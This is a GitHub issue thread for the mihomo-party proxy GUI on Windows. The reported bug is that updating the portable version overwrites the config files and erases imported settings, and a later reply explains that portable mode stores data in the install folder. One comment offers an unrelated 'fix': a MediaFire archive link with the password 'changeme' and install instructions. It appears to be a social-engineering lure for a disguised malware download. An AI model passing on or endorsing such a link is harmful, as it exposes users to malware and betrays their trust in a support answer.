### ISSUE TITLE
[Bug] 

### ISSUE THREAD

**Issue by SxKuro** [pompurin404/mihomo-party#117]
### Verify steps

- [X] 我已在标题简短的描述了我所遇到的问题
- [X] 我未在[Issue Tracker](./?q=is%3Aissue)中找到我要提出的问题
- [X] 我未在[常见问题](https://mihomo.party/guides/issue/general/)中找到我要提出的问题
- [X] 这是GUI程序的问题,而不是内核程序的问题
- [X] 我已经使用最新的测试版本测试过，问题依旧存在

### 操作系统

Windows

### 系统版本

22631.2861

### 发生问题 mihomo-party 版本

mihomo-party-windows-1.2.2-x64-setup.exe

### 描述

当左上角提示有更新的时候点击并选择在线更新时,它会提示便携版无法在线更新,只能重新下载,当软件进行正常下载更新后,配置文件会被覆盖,以前导入的配置会被清除,所有配置设置也会消失

### 重现方式

正常安装使用

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ghost** [comment]
不是提醒你了吗，你开的便携模式，安装版就不要把数据放在安装目录，就是会被覆盖的。
